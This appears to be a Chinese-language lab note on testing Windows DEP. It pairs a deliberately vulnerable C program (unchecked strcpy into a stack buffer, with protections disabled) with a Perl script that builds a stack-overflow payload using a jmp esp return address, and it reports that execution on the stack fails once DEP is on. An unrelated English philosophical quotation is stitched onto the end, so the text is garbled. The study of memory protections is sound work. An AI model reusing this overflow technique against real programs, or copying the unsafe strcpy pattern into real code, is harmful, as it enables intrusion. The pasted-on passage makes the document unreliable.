开DEP与不开DEP
测试环境:Win7 32
测试代码:
#include "stdafx.h"
#include <string.h>
int _tmain(int argc, _TCHAR* argv[])
{
char buf[500];
buf[499]=0xbb;
strcpy(buf,argv[1]);
return 0;
}
为了排除其他安全机制的影响,在VS2008里关闭了GS、RTC、ASLR。系统设置和编译选项里均开启了DEP。
测试脚本:
#just a demo for testing DEP.
my $shellcode="A"x508;
#$shellcode=$shellcode."BBBB";
$shellcode=$shellcode.pack("V",0x7602f7f7);#`jmp esp`'s addr。在运行脚本前,先用findjmp.exe找到可用跳板地址,填入与此
$shellcode=$shellcode."\x90\x90\x90\xcc";
#system("\"C:\\Program Files\\Debugging Tools for Windows (x86)\\windbg\" test.exe \"$shellcode\"\r\n");
system("\"C:\\OllyDbg 2.0\\ollydbg\" test.exe \"$shellcode\"\r\n");
不开启DEP
栈中执行指令毫无压力。
开启DEP
程序可以运行kernel32.dll里的jmp esp,之后跳转到这里:
再单步执行,便跳到了这里:
栈中代码执行失败。
Those who seek some sort of a higher purpose or 'universal goal', who don't know what to live for, who moan that they must 'find themselves'. You hear it all around us. That seems to be theofficial bromide of our century. Every book you open. Every drooling self-confession. It seems to be the noble thing to confess. I'd think it would be the most shameful one.
